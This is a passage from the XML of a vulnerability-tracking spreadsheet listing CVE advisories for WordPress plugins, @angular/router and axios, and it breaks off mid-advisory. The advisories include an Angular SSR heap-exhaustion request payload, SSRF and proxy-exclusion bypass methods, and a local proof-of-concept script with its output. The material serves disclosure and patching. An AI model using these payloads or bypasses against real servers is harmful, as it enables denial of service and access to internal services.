      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101147</t>
        </is>
      </c>
      <c r="D171" s="5" t="inlineStr"/>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="inlineStr"/>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr"/>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>The Featured Image from URL (FIFU) WordPress plugin before 6.0.8, Featured Image from URL (FIFU) Premium WordPress plugin before 8.2.8 do not correctly enforce the REST API nonce, disabling the check for the whole request when a crafted URL is used, which could allow attackers to make a logged-in administrator perform any REST API action, such as creating a new administrator account, via a CSRF attack.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101147</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101148</t>
        </is>
      </c>
      <c r="D172" s="5" t="inlineStr"/>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="inlineStr"/>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr"/>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>The BackupSheep WordPress Backup Plugin WordPress plugin through 1.8 does not properly validate its integration key, treating an unset or blank key as valid, which allows unauthenticated attackers to create and download full site backups, including the database with user password hashes, and to delete arbitrary files on the server, leading to sensitive data disclosure and site takeover.
The BackupSheep WordPress Backup Plugin WordPress plugin through 1.8 has been closed on WordPress.org since July 2024 and no fixed version is available. Remove it from any site where it is installed.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101148</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101896</t>
        </is>
      </c>
      <c r="D173" s="5" t="inlineStr"/>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/router</t>
        </is>
      </c>
      <c r="M173" s="5" t="inlineStr">
        <is>
          <t>20.3.32, 21.2.24, 22.2.0</t>
        </is>
      </c>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr"/>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>A denial of service (DoS) vulnerability was identified in `@angular/router` when Server-Side Rendering (SSR) is enabled on Node.js (V8).
When `@angular/router` parses incoming request URLs, it extracts path segments, matrix parameters, and child outlets into plain JavaScript objects (`Record&lt;string, string&gt;`). When matrix parameter names or outlet names are numeric strings (such as `/a;990;2522`), the V8 JavaScript engine interprets them as array-indexed properties rather than named properties.
Under V8's internal property-storage heuristics, setting numeric keys on an initially empty object causes V8 to allocate a dense array backing store (`HOLEY_ELEMENTS`) sized to the maximum index rather than falling back to sparse dictionary storage. Specifically, assigning sequential or moderately large numeric keys (like `990` followed by `2522`) causes V8 to allocate a contiguous backing store of ~2,522 pointers (~20 KB to 25 KB of heap) for a single 11-byte segment.
Because each segment in a URL path allocates its own independent `parameters` object, an attacker can craft URLs with repeated numeric matrix parameters to achieve an asymmetric memory amplification factor of approximately **~350x**.
### Impact
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service.
* **High Amplification:** A single 11-byte segment (`/a;990;2522`) consumes ~20 KB–25 KB of V8 heap.
* **Low Concurrency Required:**
  * With 8 KB request paths (~740 segments, within default Nginx 8 KB buffer limits), as few as **12–22 concurrent requests** crash a 256 MiB–512 MiB Node.js SSR worker.
  * With smaller 1 KB–2 KB request paths (~90–180 segments), a burst of ~50–100 concurrent requests achieves the same heap exhaustion.
* **Client-side SPAs Unaffected:** Pure client-side Angular applications (Single Page Applications without SSR) are **not** vulnerable, as local browser memory consumption does not cross a security boundary.
### Attack Preconditions &amp; Vulnerable Configurations
An application is affected only if **all** of the following conditions are met:
* **SSR Enabled:** The application runs in a Server-Side Rendering environment powered by Node.js / V8.
* **Direct Router Parsing:** User-controlled request URLs are parsed by `@angular/router` during SSR.
* **No Reverse-Proxy Semicolon/Segment Filtering:** Upstream reverse proxies (Nginx, Cloudflare, ALB) forward URLs containing semicolons (`;`) and multiple path segments without stripping or rejecting them.
#### Exploit Payload Example
An attacker sends concurrent HTTP requests with repeated numeric matrix parameters:
```http
GET /a;990;2522/a;990;2522/a;990;2522/... HTTP/1.1
Host: example.com
```
Even with paths under 2 KB, overlapping requests during SSR will rapidly consume the V8 heap until the process crashes.
### Patches
The issue is resolved by updating `@angular/router` to enforce V8 dictionary elements storage (`setUrlDerivedKey`) for numeric URL-derived keys (index &gt;= 32). This prevents V8 from allocating oversized contiguous array backing stores while preserving route matching, parameter values, and component input bindings.
* `22.2.0`
* `21.2.24`
* `20.3.32`
### Workarounds &amp; Mitigations
If you cannot immediately upgrade to a patched version, apply one of the following mitigations at your edge or reverse proxy:
1. **Block or Sanitize Matrix Parameters at the Reverse Proxy:**  
   Configure your reverse proxy (e.g., Nginx, Cloudflare, or AWS WAF) to reject or strip semicolons (`;`) in request paths before forwarding requests to the Angular SSR service:
   ```nginx
   # Nginx example: reject requests containing matrix parameters
   if ($uri ~* ";") {
       return 400;
   }
   ```
2. **Enforce Strict Path Segment Limits:**  
   Reject requests with excessive path depth (e.g., more than 20–30 segments).
3. **Increase Node.js Old Space:**  
   Increase `--max-old-space-size` (e.g., to 2048 or 4096 MB) to increase the concurrency threshold required to exhaust memory, though this does not fully eliminate the vulnerability under sustained traffic.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101896</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D174" s="5" t="inlineStr"/>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M174" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr"/>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js does not apply configured DNS lookup or proxy controls when a request uses `httpVersion: 2`. The HTTP/1 adapter path wraps and forwards `config.lookup`, builds normal request options, and applies proxy routing through `setProxy()`. The HTTP/2 path builds a session with `http2.connect()` using only `options.http2Options`, which drops the top-level `lookup`, `agent`, and proxy state.
Applications are affected when they allow a user to influence request destinations, enable axios HTTP/2, and rely on axios `lookup` or proxy routing to prevent SSRF or enforce outbound network policy.
## Impact
In affected server-side deployments, an attacker can cause axios to connect directly to destinations that the configured resolver or proxy would have rejected. Depending on reachable services, this can expose cloud metadata, internal service responses, or allow state-changing requests to internal systems.
This is not an unconditional SSRF in every axios deployment. It requires `httpVersion: 2` and an application-level trust boundary where user-influenced URLs are constrained by `lookup` or proxy policy.
## Affected Functionality
Affected:
- Node.js HTTP adapter with `httpVersion: 2`.
- `config.lookup` supplied as a DNS policy.
- Explicit `config.proxy` and environment-derived proxy settings for HTTPS HTTP/2 requests.
Not affected:
- Browser adapters.
- Node HTTP/1 requests, which pass `lookup` to the transport and apply proxy handling.
- Applications that validate destination hosts independently before calling axios.
## Technical Details
In `lib/adapters/http.js`, the adapter reads `lookup`, wraps it, stores it on the request `options`, and applies `setProxy()` before selecting a transport. For HTTP/2, `http2Transport.request()` builds an authority from `options.protocol`, `options.hostname`, and `options.port`, then calls:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` ultimately calls `http2.connect(authority, options)` with only the `http2Options` object. The configured DNS lookup and the proxy or tunneling agent installed on the top-level request options are not forwarded into that call.
Local verification on axios `1.18.1` showed `lookupCalls: 0` while an HTTP/2 request to a local h2 origin succeeded. A second local HTTPS h2 verification with an explicit rejecting HTTP proxy showed the origin received the request and the proxy observed no traffic.
## Proof of Concept of Attack
Local constrained demonstration:
1. Start an HTTP/2 server on loopback.
2. Call `axios.get("http://localhost:&lt;port&gt;/internal", { httpVersion: 2, lookup })` where `lookup` throws `EPOLICY`.
3. Observe that the request succeeds and the lookup counter remains `0`.
For proxy routing:
1. Start an HTTPS HTTP/2 origin and a local HTTP proxy that rejects every request and CONNECT.
2. Call axios with `httpVersion: 2`, `http2Options: { rejectUnauthorized: false }`, and explicit `proxy`.
3. Observe that the origin receives the request and the proxy receives nothing.
Expected safe behavior is that either the lookup policy blocks the request or the proxy observes and rejects the request.
## Workarounds
Use the HTTP/1 adapter path for requests that depend on axios `lookup` or proxy controls. Alternatively, enforce destination allow/deny policy before calling axios, outside the adapter transport path.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
  ### Summary
I found that Axios does not apply the configured `lookup` function or proxy when a request uses `httpVersion: 2`. The HTTP/1 adapter applies both controls, but the HTTP/2 path connects straight to the URL's hostname using `http2.connect()`.
This matters for server applications that accept a user-influenced URL and use a custom DNS lookup or mandatory outbound proxy to prevent SSRF. Switching the Axios instance to HTTP/2 silently removes those controls, allowing the request to reach an address the application intended to block.
I reproduced this on the current npm release, Axios 1.18.1.
### Details
The HTTP adapter reads and wraps the caller's `lookup` function, builds the normal request options, and calls `setProxy()`:
- `lib/adapters/http.js`, around lines 530-578: reads and wraps `lookup`
- `lib/adapters/http.js`, around lines 895-954: adds `lookup` to `options` and applies `setProxy()`
For HTTP/2, however, the adapter selects `http2Transport`. That transport creates an authority from the destination and only passes `options.http2Options` to the session pool:
```js
const { http2Options, headers } = options;
const session = http2Sessions.getSession(authority, http2Options);
```
`lib/helpers/Http2Sessions.js` then calls:
```js
const session = http2.connect(authority, options);
```
At this point `options` is only the `http2Options` object. The top-level `lookup`, the proxy tunnelling agent created by `setProxy()`, and the selected `httpAgent`/`httpsAgent` are not forwarded. The request therefore uses the system resolver and opens a direct connection to the origin.
The same root cause affects both explicit proxy configuration and environment-derived proxy configuration. I kept the PoC local and used an explicit proxy so the result does not depend on shell environment variables.
### PoC
I attached [axios_http2_transport_controls_poc.mjs](https://drive.google.com/file/d/1lKXBOLDoysOFRmaRyV1tMVLx3P0Ah4gV/view?usp=sharing). The PoC is entirely local and sets up three pieces:
1. An HTTPS origin with HTTP/2 enabled. If reached, it records the request and returns `REACHED_BLOCKED_ORIGIN`.
2. An HTTP proxy that records traffic but rejects every normal request and every CONNECT request with `502 Bad Gateway`.
3. A custom Axios `lookup` callback that rejects every DNS lookup with an `EPOLICY` error.
The first request is an HTTP/1 control request. It uses the blocking `lookup` callback and has proxying disabled. Axios calls the callback, receives `EPOLICY`, and does not reach the origin. This confirms that the callback works and that the hostname is blocked through the normal adapter path.
The second request targets the same URL with `httpVersion: 2`. It is given both security controls: the same blocking `lookup` callback and the rejecting proxy. If Axios honors either one, this request cannot reach the origin. It should fail with `EPOLICY`, or it should reach the proxy and receive its `502` response.
Instead, the request returns HTTP 200 with `REACHED_BLOCKED_ORIGIN`. The lookup counter does not increase, and the proxy records no request or CONNECT attempt. The origin is the only server that records traffic. This shows that the HTTP/2 path skipped both controls and connected directly using the system resolver.
To reproduce, run the attachment from the root of an Axios checkout:
Run it from the root of an Axios checkout:
```bash
git checkout v1.18.1
npm install --ignore-scripts
node /path/to/axios_http2_transport_controls_poc.mjs
```
Relevant output from my run:
```json
{
  "axiosVersion": "1.18.1",
  "configuredControls": {
    "lookup": "reject every DNS lookup with EPOLICY",
    "proxy": "http://127.0.0.1:&lt;port&gt; (reject every request)"
  },
  "http1Control": "EPOLICY: blocked by application DNS policy",
  "http2Result": {
    "status": 200,
    "data": "REACHED_BLOCKED_ORIGIN"
  },
  "lookupCalls": 1,
  "proxyObservedTraffic": false,
  "events": [
    {
      "server": "origin",
      "protocol": "h2",
      "path": "/internal"
    }
  ]
}
```
The important parts of the output are:
- `http1Control` contains `EPOLICY`, proving the DNS policy blocks the destination under HTTP/1.
- `lookupCalls` is still `1` after both requests, proving HTTP/2 never called the configured resolver.
- `proxyObservedTraffic` is `false`, proving HTTP/2 did not use the configured proxy.
- `http2Result.status` is `200`, and the sole event belongs to the origin, proving Axios connected directly to the blocked destination.
### Impact
The vulnerable configuration is a Node.js application that:
- enables Axios HTTP/2 using `httpVersion: 2`;
- lets an application user influence the request destination; and
- relies on Axios's `lookup` option or proxy routing to enforce a destination or egress policy.
In that setup, an unauthenticated application user may be able to make the server connect directly to loopback, private-network, or link-local services that the lookup policy or proxy would have rejected. Depending on the reachable service, this can expose cloud credentials or internal data, modify internal services, or affect availability.
HTTP/2 support is marked experimental, but neither the HTTP/2 documentation nor the proxy documentation says that `lookup` and proxy controls are ignored. The proxy documentation states that HTTPS requests are sent through a CONNECT tunnel. More importantly, Axios's threat model tells callers that destination validation is their responsibility; this behavior silently bypasses such caller-supplied validation.
I did not test against any third-party or production service. The PoC only uses listeners on my own machine.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101899</t>
        </is>
      </c>
      <c r="D175" s="5" t="inlineStr"/>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M175" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr"/>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios supports proxy environment variables and evaluates `NO_PROXY` exclusions in the Node.js adapter. CIDR-form `NO_PROXY` entries such as `127.0.0.0/8`, `10.0.0.0/8`, or `169.254.169.254/32` are not interpreted as IP ranges. As a result, a request to an IP address inside a configured CIDR exclusion can still be sent through the configured proxy.
This affects deployments that rely on CIDR notation to keep loopback, private, Kubernetes, CI, or cloud metadata traffic away from proxy infrastructure.
## Impact
If the configured proxy is outside the intended trust boundary, requests that operators expected to bypass the proxy may be exposed to it. For plaintext HTTP targets, the proxy can see and modify URLs, headers, and bodies. For HTTPS targets, the proxy still observes connection metadata and may receive CONNECT requests that policy expected to avoid.
This is a proxy exclusion bypass, not arbitrary proxy injection by itself.
## Affected Functionality
Affected:
- Node.js adapter proxy environment handling.
- `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY`, or lowercase equivalents.
- CIDR entries in `NO_PROXY`.
Not affected:
- Exact host or exact IP `NO_PROXY` entries where axios matching succeeds.
- Requests configured with `proxy: false`.
- Browser adapters.
## Technical Details
`lib/helpers/shouldBypassProxy.js` parses each `NO_PROXY` entry into a host and optional port, normalizes hostnames, and then compares exact hostnames, suffix entries, wildcard-prefix entries, and loopback equivalents. It does not parse CIDR notation.
Local verification on axios `1.18.1`:
```js
process.env.NO_PROXY = '127.0.0.0/8';
shouldBypassProxy('http://127.0.0.1:1234/'); // false
```
The expected result for CIDR-aware bypass policy is `true`.
## Proof of Concept of Attack
Constrained local demonstration:
1. Set `HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;`.
2. Set `NO_PROXY=127.0.0.0/8`.
3. Request `http://127.0.0.1:&lt;internal-port&gt;/metadata`.
4. Observe that axios sends the request through the proxy instead of directly to the internal listener.
## Workarounds
Use exact host or IP entries in `NO_PROXY` for sensitive destinations until CIDR matching is fixed, for example `127.0.0.1,localhost,169.254.169.254`. For individual requests that must not use a proxy, set `proxy: false`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 honors `HTTP_PROXY` / `HTTPS_PROXY` and supports `NO_PROXY` host exclusions, but CIDR-form `NO_PROXY` entries such as `127.0.0.0/8` are not treated as network ranges. As a result, requests to IPs covered by a configured CIDR exclusion may still be sent through the configured proxy.
In the attached PoC, a request to `127.0.0.1` is sent through `HTTP_PROXY` despite `NO_PROXY=127.0.0.0/8`.
This can cause proxy exclusion bypass in environments where operators use CIDR notation to exclude loopback, private, internal, Kubernetes, CI, or cloud metadata address ranges from proxying.
## Details
Axios supports proxy environment variables, including `HTTP_PROXY` / `HTTPS_PROXY` and `NO_PROXY`-style exclusions. Axios’s threat model treats environment proxy handling as security-relevant and lists `NO_PROXY` as a mitigation for proxy environment variable hijack, including hardening for CIDR ranges, IPv6 literals, and wildcard patterns. See: https://github.com/axios/axios/blob/a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b/THREATMODEL.md#t-r9-proxy-environment-variable-hijack
The issue is that CIDR-form `NO_PROXY` entries are not interpreted as network ranges. For example:
```text
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:&lt;proxy-port&gt;
Target URL=http://127.0.0.1:&lt;internal-port&gt;/metadata
```
Since `127.0.0.1` is inside `127.0.0.0/8`, an operator may reasonably expect Axios to bypass the proxy for this request. Instead, Axios sends the request through `HTTP_PROXY`.
This appears to affect the proxy bypass decision path used for `NO_PROXY` / `no_proxy` handling. The relevant behavior is in Axios's Node proxy handling and `NO_PROXY` evaluation logic, including the `shouldBypassProxy` helper introduced for `no_proxy` hostname normalization and bypass checks.
The issue is not that Axios ignores `NO_PROXY` entirely. Exact host exclusions work. The issue is specifically that CIDR-form exclusions are silently treated as non-matching host/domain tokens rather than as network ranges, causing the request to be proxied.
This is security-relevant because CIDR notation is commonly used in container, CI, enterprise proxy, and cloud environments for ranges such as:
```text
127.0.0.0/8
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.169.254/32
```
If operators rely on those entries to prevent internal or metadata-style requests from traversing a proxy, Axios may violate that expectation.
## PoC
```js
import http from 'http';
import axios from 'axios';
function listen(server, host) {
  return new Promise((resolve, reject) =&gt; {
    server.once('error', reject);
    server.listen(0, host, () =&gt; resolve(server.address().port));
  });
}
function close(server) {
  return new Promise((resolve) =&gt; server.close(resolve));
}
let proxyHits = 0;
let internalHits = 0;
const internal = http.createServer((req, res) =&gt; {
  internalHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`internal service saw ${req.url}`);
});
const proxy = http.createServer((req, res) =&gt; {
  proxyHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`proxy saw request for ${req.url}`);
});
const internalHost = process.env.POC_INTERNAL_HOST || '127.0.0.2';
const proxyHost = process.env.POC_PROXY_HOST || '127.0.0.1';
let internalPort;
let proxyPort;
try {
  internalPort = await listen(internal, internalHost);
  proxyPort = await listen(proxy, proxyHost);
} catch (error) {
  console.error('Failed to bind local PoC servers.');
  console.error('On some systems 127.0.0.2 is unavailable; try:');
  console.error('  POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs');
  console.error('');
  throw error;
}
const targetUrl = `http://${internalHost}:${internalPort}/metadata`;
const proxyUrl = `http://${proxyHost}:${proxyPort}`;
const noProxy = process.env.POC_NO_PROXY || '127.0.0.0/8';
process.env.http_proxy = proxyUrl;
process.env.HTTP_PROXY = proxyUrl;
process.env.no_proxy = noProxy;
process.env.NO_PROXY = noProxy;
console.log('Axios NO_PROXY CIDR full axios network PoC');
console.log(`axios VERSION=${axios.VERSION || 'unknown'}`);
console.log(`NO_PROXY=${process.env.no_proxy}`);
console.log(`HTTP_PROXY=${process.env.http_proxy}`);
console.log(`Target URL=${targetUrl}`);
console.log('');
try {
  const response = await axios.get(targetUrl, {
    timeout: 2000,
  });
  console.log(`Response=${response.data}`);
  console.log(`Proxy hits=${proxyHits}`);
  console.log(`Internal direct hits=${internalHits}`);
  console.log('');
  if (proxyHits &gt; 0 &amp;&amp; internalHits === 0) {
    console.log(`POC RESULT: axios sent the target through the proxy with NO_PROXY=${noProxy}.`);
  } else if (proxyHits === 0 &amp;&amp; internalHits &gt; 0) {
    console.log(`POC RESULT: axios bypassed the proxy with NO_PROXY=${noProxy}.`);
  } else {
    console.log('POC RESULT: mixed/ambiguous routing; inspect counts above.');
  }
} finally {
  delete process.env.http_proxy;
  delete process.env.HTTP_PROXY;
  delete process.env.no_proxy;
  delete process.env.NO_PROXY;
  await close(proxy);
  await close(internal);
}
```
Run the failing CIDR case:
```bash
POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Observed:
```text
Axios NO_PROXY CIDR full axios network PoC
axios VERSION=1.17.0
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:34315
Target URL=http://127.0.0.1:43993/metadata
Response=proxy saw request for http://127.0.0.1:43993/metadata
Proxy hits=1
Internal direct hits=0
POC RESULT: axios sent the target through the proxy with NO_PROXY=127.0.0.0/8.
```
## Control
Axios does honor exact IP `NO_PROXY` entries:
```bash
POC_INTERNAL_HOST=127.0.0.1 POC_NO_PROXY=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
```
Expected:
```text
NO_PROXY=127.0.0.1
Response=internal service saw /metadata
Proxy hits=0
Internal direct hits=1
POC RESULT: axios bypassed the proxy with NO_PROXY=127.0.0.1.
```
This shows the issue is not that `NO_PROXY` is ignored entirely. The bypass failure is specific to CIDR-form entries such as `127.0.0.0/8`.
## Impact
This is a proxy exclusion bypass caused by unsupported CIDR matching in `NO_PROXY`.
The impact is configuration-dependent. It affects Axios users in Node.js environments who rely on proxy environment variables and configure `NO_PROXY` using CIDR notation to exclude internal, loopback, private, Kubernetes, CI, or cloud metadata ranges.
Potentially impacted environments include:
- CI/CD runners with globally injected `HTTP_PROXY` / `HTTPS_PROXY`.
- Containers inheriting proxy variables from the host or orchestrator.
- Kubernetes workloads using `NO_PROXY` for cluster-internal service ranges.
- Enterprise networks using HTTP proxies with internal network exclusions.
- Cloud workloads relying on `NO_PROXY` to keep metadata or internal service requests off proxy infrastructure.
If a configured proxy is compromised, attacker-controlled, overly broad, or outside the intended trust boundary, requests that operators expected to stay direct may instead be exposed to that proxy. This may expose request URLs, internal hostnames, paths, headers, or credentials depending on application behavior.
This should not be characterized as arbitrary proxy injection by itself. The issue is that Axios silently fails to enforce common CIDR-form proxy exclusions, which can undermine proxy bypass policy and defense-in-depth assumptions.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101899</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D176" s="5" t="inlineStr"/>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr"/>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios contains a guard in the Node HTTP adapter to avoid using an inherited `Object.prototype.getHeaders` as a FormData header source. The fetch adapter calls the shared `resolveConfig()` helper before dispatch, and that helper lacks the same guard. If another vulnerability pollutes `Object.prototype` with FormData-like properties and `getHeaders()`, the fetch adapter can merge attacker-controlled headers into the outbound request.
Axios does not create the prototype pollution source. This is a read-side gadget in the fetch adapter configuration path.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into fetch-adapter requests. Depending on the target service, this may affect authorization, metadata-service access, cache behavior, conditional request handling, or other application-specific header logic.
Plain objects are blocked by current FormData detection. The confirmed path uses arrays or non-plain class instances whose prototype chain can resolve polluted FormData-like properties.
## Affected Functionality
Affected:
- Fetch adapter requests.
- `resolveConfig()` handling of `utils.isFormData(data)`.
- Request bodies that can be spoofed as FormData through inherited `Symbol.toStringTag`, `append`, and `getHeaders`.
Not affected:
- Node HTTP adapter's later FormData header path, which checks `data.getHeaders !== Object.prototype.getHeaders`.
- Plain object request bodies rejected by current `isFormData()` plain-object guard.
- Processes without prototype pollution.
## Technical Details
`lib/helpers/resolveConfig.js` currently contains:
```js
if (utils.isFormData(data)) {
